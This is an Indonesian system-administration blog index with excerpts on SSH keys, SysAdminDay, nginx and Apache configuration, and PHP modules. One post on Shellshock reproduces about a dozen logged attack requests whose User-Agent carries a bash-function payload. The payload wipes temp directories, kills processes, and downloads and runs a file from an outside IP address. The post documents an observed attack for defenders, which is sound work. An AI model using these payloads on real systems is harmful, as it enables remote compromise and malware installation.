Author: bimosaurus

SSH Tanpa Password dengan Authentication Key

Posted on by bimosaurus

Kadang, karena suatu kebutuhan, dibutuhkan akses SSH tanpa password. Kebutuhan-kebutuhan itu antara lain :

  1. Auto SSH antar server
  2. Auto SCP antar server
  3. Pembentukan SSHFS untuk keperluan mounting data dari satu direktori di satu komputer, agar dapat dijadikan sebagai direktori bagi komputer lainnya.

Secara default, proses SSH sendiri tidak bisa dilakukan tanpa password. Jadi jika dibuat satu akun tanpa password (password kosong) kemudian dilakukan akses SSH ke akun tersebut, tidak akan berhasil. Satu-satunya cara adalah : membuat authentication key dari satu server, yang kemudian dikenali di komputer yang lain.
Continue reading “SSH Tanpa Password dengan Authentication Key”

Artikel terkait

Asal-usul Hari System Administrator

Posted on by bimosaurus

Ada artikel menarik dari literatur sebelah:

Apa itu SysAdminDay

Dalam dunia IT terutama di kalangan komunitas, dikenal sebuah hari yang dinamakan SysAdminDay atau hari System Administrator. System Administrator adalah sebuah profesi dalam bidang Teknologi Informasi dengan deskripsi pekerjaan menangani sistem komputer, mulai dari hardware, software, jaringan atau network, Operating System, server, web, database, virus, gangguan komputer, dan sejenisnya. Hari System Administrator ini telah dimulai sejak tahun 2000 yang dimulai dengan adanya iklan pada sebuah majalah Hewlett-Packard, yang menyarankan memberikan bingkisan pada orang yang telah memperbaiki sistem komputer kita. SysAdminDay diletakkan pada sebuah hari Jumat terakhir pada bulan Juli, yaitu sebuah hari terakhir bekerja pada bulan Juli, yang di Amerika termasuk bulan yang paling sibuk untuk seorang System Administrator. Hari itu, dianjurkan diberikan penghargaan bagi para System Administrator. Hari itu disebut SysAdminDay, atau disingkat SAD, atau SAAD (System Administrator Apreciation Day). 

System Administrator ini pada umumnya memiliki meja kerja dekat dengan gagang telepon, siap menerima telepon setiap saat, baik telepon dari teman-temannya maupun telepon dari client perusahan tempat dia bekerja. Semua memiliki nada sama : melakukan permintaan / request tentang system. Hardware rusak, IP address conflict, virus, serangan web, flooding, gangguan jaringan, DOS, data rusak, hardisk rusak, listrik mati mendadak, resiko petir adalah pekerjaan tiap hari dari seorang system administrator sebagai seorang yang menjaga seluruh sistem dari accidental risk.
saad

Menyiapkan mitigasi disaster di bidang teknologi informasi pada lingkungan pekerjaannya adalah tugas seorang System Administrator. Menyiapkan sistem backup, melakukan rsync, mengusulkan update UPS, mempersiapkan genset, melakukan setting NAS server, melakukan monitoring jaringan, lembur di kala karyawan lain tertidur untuk melakukan pemantauan traffic web adalah tanggung jawab para system administrator. Menyiapkan topologi datacenter, merancang cabling, melakukan perapian kabel, adalah tugas yang semestinya dilakukan oleh system administrator.
IMG_20150728_064223

Kadang, sysadmin sebagai seorang manusia biasa, harus bekerja trial and error, mencoba dan selalu melewati kegagalan. Dia mencoba dan gagal, hingga akhirnya menemukan metoda suksesnya sendiri. Kadang, seorang sysadmin yang menjadi tumpuan curhat komputer teman-temannya, adalah seorang yang sangat ahli mendengar curhat temannya. Saat dia tidak bisa, setidaknya dia adalah seorang pendengar yang baik.

Happy #SysAdminDay July 31, 2015

Reblog dari http://tekno.ensiklo.com/asal-usul-hari-system-administrator/

Artikel terkait

[WebServer] Mengaktifkan Fitur Kompresi Webserver

Posted on by bimosaurus
nginx
Salah satu bentuk dukungan pemilik web terhadap para pengaksesnya adalah : mempermudah proses pembukaan web. Mempermudah itu dapat berarti banyak hal:

  1. Mengaktifkan tampilan yang responsif terhadap lebar layar dan jenis media
  2. Memperingan load web, selain cepat diakses juga mengurangi pemborosan quota selular pengakses

Continue reading “[WebServer] Mengaktifkan Fitur Kompresi Webserver”

Artikel terkait

[FlashBackBlog] Menggunakan nGinX sebagai Reverse Proxy

Posted on by bimosaurus
Nginx, adalah sebuah webserver opensources yang dikembangkan dari keturunan Apache. Nginx, seperti apache, memiliki fungsi melakukan publikasi dokumen dalam sistem, ke sisi publik, melalui protokol HTTP atau port default 80. Nginx, adalah singkatan dari Engine-X. nGinX. Memiliki tingkat keringanan eksekusi dokumen yang lebih kencang daripada Apache. Namun tentu saja beberapa kekurangannya adalah kelengkapan modul yang diperlukan oleh web, kalah oleh Apache. Namun demikian untuk web-web biasa, atau sistem informasi biasa, tidak terlalu membutuhkan modul-modul terlalu lengkap.
Continue reading “[FlashBackBlog] Menggunakan nGinX sebagai Reverse Proxy”

Artikel terkait

[Flash Back] VirtualHost Apache dan Nginx

Posted on by bimosaurus

virtualhost-block

Webserver, entah apache atau nginx dan lain sebagainya akan mengenal istilah ServerName atau nama panggil. Sebuah server yang dipanggil dengan nama tertentu, misal namaserver.com, akan terjadi proses pengambilan dokumen di dalam webserver. Lokasi dokumen tersebut dinamakan DocumentRoot. Oleh karena itu dalam server apache, akan muncul sintaks konfigurasi seperti berikut:

Continue reading “[Flash Back] VirtualHost Apache dan Nginx”

Artikel terkait

[Tips] Menambahkan Module dbase pada PHP-5.4

Posted on by bimosaurus

Module dbase, digunakan oleh PHP untuk mengerjakan file-file bertipe DBF. Biasanya merupakan obyek yang dikerjakan oleh bahasa pemrograman Foxpro. PHP sebelum 5.3 justru telah dilengkapi paket installasinya untuk keperluan dbase ini. Setelah muncul PHP-5.3 justru bawaan dbase ini dihilangkan. Pada PHP sebelumnya, cara installasi PHP dbase adalah dengan cara
Continue reading “[Tips] Menambahkan Module dbase pada PHP-5.4”

[Security] Serangan pada bug ShellShock melalui PHP-CGI

Posted on by bimosaurus

Sebelum lebih jelas bercerita tentang serangan shellshock ini, ada baiknya juga membaca cerita ini:

http://en.wikipedia.org/wiki/Shellshock_(software_bug)
http://www.troyhunt.com/2014/09/everything-you-need-to-know-about.html
https://shellshocker.net/

Shellshock ini bug yang dirilis kisah vulnerability-nya pada sekitar akhir 2014. Shellshock ini menyerang beberapa service network yang memiliki kemampuan execute command dari sisi client, dengan otentifikasi lemah. Shellshock ini merupakan bug keluarga dari bash bug. Shellshock paling deras menyanyerang webserver Apache yang menjalankan PHP-CGI. Sementara PHP-CGI banyak digunakan oleh layanan hosting untuk melayani multiversi PHP permintaan para client. Perhatikan pada attachment berikut:

5.135.167.145 - - [20/Apr/2015:23:55:29 +0700] "GET /cgi-bin/test.cgi HTTP/1.1" 404 470 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; killall -9 b f r  y print start pscan pnscan ps  ; wget http://217.217.198.42/y.gif ; curl -O http://217.217.198.42/y.gif ; fetch http://217.217.198.42/y.gif ; lwp-download http://217.217.198.42/y.gif ; chmod +x y.gif ; sh y.gif ; rm -rf y.gif* \");'"
5.135.167.145 - - [20/Apr/2015:23:55:30 +0700] "GET /cgi-bin/test-cgi.pl HTTP/1.1" 404 472 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; killall -9 b f r  y print start pscan pnscan ps  ; wget http://217.217.198.42/y.gif ; curl -O http://217.217.198.42/y.gif ; fetch http://217.217.198.42/y.gif ; lwp-download http://217.217.198.42/y.gif ; chmod +x y.gif ; sh y.gif ; rm -rf y.gif* \");'"
5.135.167.145 - - [20/Apr/2015:23:55:31 +0700] "GET /cgi-bin/test.sh HTTP/1.1" 404 470 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; killall -9 b f r  y print start pscan pnscan ps  ; wget http://217.217.198.42/y.gif ; curl -O http://217.217.198.42/y.gif ; fetch http://217.217.198.42/y.gif ; lwp-download http://217.217.198.42/y.gif ; chmod +x y.gif ; sh y.gif ; rm -rf y.gif* \");'"
5.135.167.145 - - [20/Apr/2015:23:55:32 +0700] "GET /cgi-bin/tools/tools.pl HTTP/1.1" 404 473 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; killall -9 b f r  y print start pscan pnscan ps  ; wget http://217.217.198.42/y.gif ; curl -O http://217.217.198.42/y.gif ; fetch http://217.217.198.42/y.gif ; lwp-download http://217.217.198.42/y.gif ; chmod +x y.gif ; sh y.gif ; rm -rf y.gif* \");'"
5.135.167.145 - - [20/Apr/2015:23:55:32 +0700] "GET /cgi-mod/index.cgi HTTP/1.1" 404 473 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; killall -9 b f r  y print start pscan pnscan ps  ; wget http://217.217.198.42/y.gif ; curl -O http://217.217.198.42/y.gif ; fetch http://217.217.198.42/y.gif ; lwp-download http://217.217.198.42/y.gif ; chmod +x y.gif ; sh y.gif ; rm -rf y.gif* \");'"
5.135.167.145 - - [20/Apr/2015:23:55:33 +0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 479 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; killall -9 b f r  y print start pscan pnscan ps  ; wget http://217.217.198.42/y.gif ; curl -O http://217.217.198.42/y.gif ; fetch http://217.217.198.42/y.gif ; lwp-download http://217.217.198.42/y.gif ; chmod +x y.gif ; sh y.gif ; rm -rf y.gif* \");'"
5.135.167.145 - - [20/Apr/2015:23:55:34 +0700] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 477 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; killall -9 b f r  y print start pscan pnscan ps  ; wget http://217.217.198.42/y.gif ; curl -O http://217.217.198.42/y.gif ; fetch http://217.217.198.42/y.gif ; lwp-download http://217.217.198.42/y.gif ; chmod +x y.gif ; sh y.gif ; rm -rf y.gif* \");'"
5.135.167.145 - - [20/Apr/2015:23:55:34 +0700] "GET /cgi-sys/php5 HTTP/1.1" 404 470 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; killall -9 b f r  y print start pscan pnscan ps  ; wget http://217.217.198.42/y.gif ; curl -O http://217.217.198.42/y.gif ; fetch http://217.217.198.42/y.gif ; lwp-download http://217.217.198.42/y.gif ; chmod +x y.gif ; sh y.gif ; rm -rf y.gif* \");'"
5.135.167.145 - - [20/Apr/2015:23:55:35 +0700] "GET /phppath/cgi_wrapper HTTP/1.1" 404 474 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; killall -9 b f r  y print start pscan pnscan ps  ; wget http://217.217.198.42/y.gif ; curl -O http://217.217.198.42/y.gif ; fetch http://217.217.198.42/y.gif ; lwp-download http://217.217.198.42/y.gif ; chmod +x y.gif ; sh y.gif ; rm -rf y.gif* \");'"
5.135.167.145 - - [20/Apr/2015:23:55:36 +0700] "GET /phppath/php HTTP/1.1" 404 465 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; killall -9 b f r  y print start pscan pnscan ps  ; wget http://217.217.198.42/y.gif ; curl -O http://217.217.198.42/y.gif ; fetch http://217.217.198.42/y.gif ; lwp-download http://217.217.198.42/y.gif ; chmod +x y.gif ; sh y.gif ; rm -rf y.gif* \");'"
5.135.167.145 - - [20/Apr/2015:23:55:11 +0700] "GET / HTTP/1.1" 200 524 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; killall -9 b f r  y print start pscan pnscan ps  ; wget http://217.217.198.42/y.gif ; curl -O http://217.217.198.42/y.gif ; fetch http://217.217.198.42/y.gif ; lwp-download ; chmod +x y.gif ; sh y.gif ; rm -rf y.gif* \");'"

Continue reading “[Security] Serangan pada bug ShellShock melalui PHP-CGI”

Artikel terkait